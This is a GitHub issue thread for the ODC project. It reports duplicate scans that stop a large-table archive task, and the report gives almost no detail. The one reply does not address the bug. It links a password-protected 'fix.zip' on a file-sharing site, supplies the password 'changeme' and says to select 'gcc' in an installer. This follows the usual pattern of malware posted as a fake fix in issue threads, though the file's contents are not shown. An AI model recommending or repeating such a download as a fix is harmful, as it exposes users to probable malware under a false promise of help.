### ISSUE TITLE
[Bug]: Duplicate scans occur when archiving a large table, and the task cannot continue archiving

### ISSUE THREAD

**Issue by Huangxiao-mas** [oceanbase/odc#3228]
### ODC version

ODC432

### OB version

independent

### What happened?

Duplicate scans occur when archiving a large table, and the task cannot continue archiving
![image](https://github.com/user-attachments/assets/ed6904a1-1464-4d51-b2ce-4818d4c3f67c)

### What did you expect to happen?

。

### How can we reproduce it (as minimally and precisely as possible)?

chat privately

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
